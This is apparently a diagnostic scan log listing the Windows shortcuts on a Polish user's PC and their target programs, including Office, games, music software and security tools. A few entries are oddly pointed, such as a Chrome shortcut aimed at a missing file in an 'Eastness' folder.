Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PrintDialog.lnk -> C:\Windows\PrintDialog\PrintDialog.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\MSPUB.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Sims 4.lnk -> C:\Program Files (x86)\The Sims 4\Game\Bin\TS4.exe (Electronic Arts Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Co nowego w ostatniej wersji.lnk -> C:\Program Files\WinRAR\CoNowego.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Podręcznik RARa dla konsoli.lnk -> C:\Program Files\WinRAR\Rar.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Pomoc WinRARa.lnk -> C:\Program Files\WinRAR\WinRAR.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk -> C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Windows Defender.lnk -> C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sylenth1\Manual.lnk -> C:\sylenthhh\Sylenth1\Manual-English.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sylenth1\Uninstall Sylenth1.lnk -> C:\sylenthhh\Sylenth1\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sylenth1\Visit LennarDigital.lnk -> C:\sylenthhh\Sylenth1\LennarDigital.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe (McAfee, Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot\ScreenShot.lnk -> C:\Program Files (x86)\ScreenShot\ScreenShot.exe (Filseclab Corporation Limited)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot\SSInst.lnk -> C:\Program Files (x86)\ScreenShot\SSInst.exe (Filseclab Corporation Limited)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlayWay SA\Farm Expert 2017\Deinstalacja programu Farm Expert 2017.lnk -> C:\Program Files (x86)\Farm Expert 2017\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlayWay SA\Farm Expert 2017\Farm Expert 2017 Editor.lnk -> C:\Program Files (x86)\Farm Expert 2017\ar_edytor.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlayWay SA\Farm Expert 2017\Farm Expert 2017.lnk -> C:\Program Files (x86)\Farm Expert 2017\FE2017.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlayWay SA\Farm Expert 2017\Uninstall Farm Expert 2017.lnk -> [LFPO :i+00C:\Windows\system32] (Brak pliku)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Narzędzia pakietu Microsoft Office 2016\Preferencje językowe pakietu Office 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\My Connection\Deinstalacja programu  My Connection.lnk -> C:\Program Files (x86)\My Connection\uninst\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\My Connection\My Connection.lnk -> C:\Program Files (x86)\My Connection\Maincontroller.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes\Malwarebytes.lnk -> C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe (Malwarebytes)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes\Uninstall Malwarebytes.lnk -> C:\Program Files\Malwarebytes\Anti-Malware\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12.lnk -> C:\FL Studio 12.4.2\FL.exe (Image-Line)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line\More....lnk -> C:\Program Files (x86)\Image-Line\Shared\Start ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emergency 2017\Emergency 2017.lnk -> C:\Program Files (x86)\Emergency 2017\bin\em5_launcher.exe (Sixteen Tons Entertainment)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emergency 2017\Uninstall Emergency 2017.lnk -> C:\Program Files (x86)\Emergency 2017\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DLL-Files.com Client\Client.lnk -> C:\Program Files (x86)\DLL-Files.com Client\DLLFilesClient.exe (DLL-files.com)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DLL-Files.com Client\Deinstalacja programu Client.lnk -> C:\Program Files (x86)\DLL-Files.com Client\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink PowerDVD 12\CyberLink PowerDVD 12.lnk -> C:\Program Files (x86)\CyberLink\PowerDVD12\PDVDLP.exe (CyberLink Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine 6.6 (32-bit).lnk -> C:\Program Files (x86)\Cheat Engine 6.6\cheatengine-i386.exe (Cheat Engine)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine 6.6 (64-bit).lnk -> C:\Program Files (x86)\Cheat Engine 6.6\cheatengine-x86_64.exe (Cheat Engine)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine 6.6.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\Cheat Engine.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine help.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\CheatEngine.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine tutorial (64-bit).lnk -> C:\Program Files (x86)\Cheat Engine 6.6\Tutorial-x86_64.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine tutorial.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\Tutorial-i386.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Reset settings.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\ceregreset.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Uninstall Cheat Engine.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Kernel stuff\Unload kernel module.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\Kernelmoduleunloader.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BitComet (64-bit)\BitComet.lnk -> C:\Program Files\BitComet\BitComet.exe (www.BitComet.com)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BitComet (64-bit)\HomePage.lnk -> C:\Program Files\BitComet\BitComet.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BitComet (64-bit)\Uninstall.lnk -> C:\Program Files\BitComet\uninst.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net\Battle.net.lnk -> C:\Program Files (x86)\Battle.net\Battle.net Launcher.exe (Blizzard Entertainment)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk -> C:\Windows\System32\comexp.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\dfrgui.lnk -> C:\Windows\System32\dfrgui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Disk Cleanup.lnk -> C:\Windows\System32\cleanmgr.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk -> C:\Windows\System32\iscsicpl.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk -> C:\Windows\System32\MdSched.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (32-bit).lnk -> C:\Windows\SysWOW64\odbcad32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ODBC Data Sources (64-bit).lnk -> C:\Windows\System32\odbcad32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk -> C:\Windows\System32\services.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk -> C:\Windows\System32\msconfig.exe (Microsoft® Windows® Operating System)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Information.lnk -> C:\Windows\System32\msinfo32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk -> C:\Windows\System32\WF.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\abPhoto.lnk -> C:\Program Files (x86)\Acer\abPhoto\abPhoto.exe (Acer Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer Care Center.lnk -> C:\Program Files (x86)\Acer\Care Center\CareCenter.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer Power Button.lnk -> C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe (Acer Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer Quick Access.lnk -> C:\Program Files\Acer\Acer Quick Access\QuickAccess.exe (Acer Incorporated)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer User Experience Improvement Program.lnk -> C:\Program Files\Acer\User Experience Improvement Program\Framework\Setting.exe (acer)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk -> C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk -> C:\Windows\System32\mspaint.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Quick Assist.lnk -> C:\Windows\System32\quickassist.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk -> C:\Windows\System32\mstsc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk -> C:\Windows\System32\SnippingTool.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Steps Recorder.lnk -> C:\Windows\System32\psr.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Fax and Scan.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk -> C:\Program Files\Windows NT\Accessories\wordpad.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\XPS Viewer.lnk -> C:\Windows\System32\xpsrchvw.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk -> C:\Windows\System32\charmap.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk -> C:\Windows\explorer.exe,-30
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonAssistant.lnk -> C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantTaskbar.exe ()
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk -> C:\Windows\System32\compmgmt.msc ()
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk -> C:\Windows\System32\diskmgmt.msc ()
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk -> C:\Windows\System32\eventvwr.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk -> C:\Windows\System32\mblctr.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\Music\Obrazy — skrót.lnk -> C:\Users\Emil\Pictures ()
Shortcut: C:\Users\Emil\Links\Desktop.lnk -> C:\Users\Emil\Desktop ()
Shortcut: C:\Users\Emil\Links\Downloads.lnk -> C:\Users\Emil\Downloads ()
Shortcut: C:\Users\Emil\Desktop\FL Studio 12 (64bit).lnk -> C:\FL Studio 12.4.2\FL64.exe (Image-Line)
Shortcut: C:\Users\Emil\Desktop\FL Studio 12.lnk -> C:\FL Studio 12.4.2\FL.exe (Image-Line)
Shortcut: C:\Users\Emil\Desktop\Komp.lnk -> System Folder
Shortcut: C:\Users\Emil\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Emil\Desktop\OpenFM.lnk -> C:\Users\Emil\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Emil\Desktop\Opera.lnk -> C:\Users\Emil\AppData\Local\Programs\Opera\launcher.exe (Opera Software)
Shortcut: C:\Users\Emil\Desktop\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Emil\Desktop\Proje\GG.lnk -> C:\Users\Emil\AppData\Local\GG\Application\gghub.exe (GG Network S.A.)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GG.lnk -> C:\Users\Emil\AppData\Local\GG\Application\gghub.exe (GG Network S.A.)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Menedżer HD Audio.lnk -> C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk -> C:\Users\Emil\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OpenFM.lnk -> C:\Users\Emil\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera.lnk -> C:\Users\Emil\AppData\Local\Programs\Opera\launcher.exe (Opera Software)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ustawienia aktualizacji i prywatności.lnk -> C:\Windows\System32\UNP\UNPUXHost.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wolfenstein - Enemy Territory\Enemy Territory.lnk -> C:\Program Files (x86)\Wolfenstein - Enemy Territory\et.exe ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wolfenstein - Enemy Territory\Help.lnk -> C:\Program Files (x86)\Wolfenstein - Enemy Territory\Docs\Help\index.htm ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wolfenstein - Enemy Territory\Uninstall.lnk -> C:\Program Files (x86)\Wolfenstein - Enemy Territory\uninstall.exe ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wolfenstein - Enemy Territory\PunkBuster\PB Install.lnk -> C:\Program Files (x86)\Wolfenstein - Enemy Territory\pb\pbsvc.exe ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Co nowego w ostatniej wersji.lnk -> C:\Program Files\WinRAR\CoNowego.txt ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Podręcznik RARa dla konsoli.lnk -> C:\Program Files\WinRAR\Rar.txt ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Pomoc WinRARa.lnk -> C:\Program Files\WinRAR\WinRAR.chm ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk -> C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk -> C:\Windows\explorer.exe,-30
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12 (32bit).lnk -> C:\FL Studio 12.4.2\FL.exe (Image-Line)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12 (64bit).lnk -> C:\FL Studio 12.4.2\FL64.exe (Image-Line)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12.lnk -> C:\FL Studio 12\FL.exe (Brak pliku)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\IL Download Manager.lnk -> C:\Program Files (x86)\Image-Line\Downloader\ILDownloadManager.exe (Image-Line)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\More....lnk -> C:\Program Files (x86)\Image-Line\Shared\Start ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\SendTo\Transfer plików Bluetooth.LNK -> C:\Windows\System32\fsquirt.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Opera.lnk -> C:\Users\Emil\AppData\Local\Programs\Opera\launcher.exe (Opera Software)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\ScreenShot.lnk -> C:\Program Files (x86)\ScreenShot\ScreenShot.exe (Filseclab Corporation Limited)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Emil\AppData\Local\OpenFM\Application\OpenFM.lnk -> C:\Users\Emil\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk -> C:\Windows\System32\compmgmt.msc ()
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk -> C:\Windows\System32\diskmgmt.msc ()
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk -> C:\Windows\System32\eventvwr.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk -> C:\Windows\System32\mblctr.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\GG\Application\gg.lnk -> C:\Users\Emil\AppData\Local\GG\Application\gghub.exe (GG Network S.A.)
Shortcut: C:\Users\Public\Desktop\Adobe Reader 9.lnk -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe (Adobe Systems Incorporated)
Shortcut: C:\Users\Public\Desktop\Farming Simulator 17.lnk -> C:\Program Files\Farming Simulator 17\x64\FarmingSimulator2017Game.exe (GIANTS Software GmbH)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Brak pliku)
Shortcut: C:\Users\Public\Desktop\Malwarebytes.lnk -> C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe (Malwarebytes)
Shortcut: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Public\Desktop\My Connection.lnk -> C:\Program Files (x86)\My Connection\Maincontroller.exe ()
Shortcut: C:\Users\Public\Desktop\The Sims 4.lnk -> C:\Program Files (x86)\The Sims 4\Game\Bin\TS4.exe (Electronic Arts Inc.)


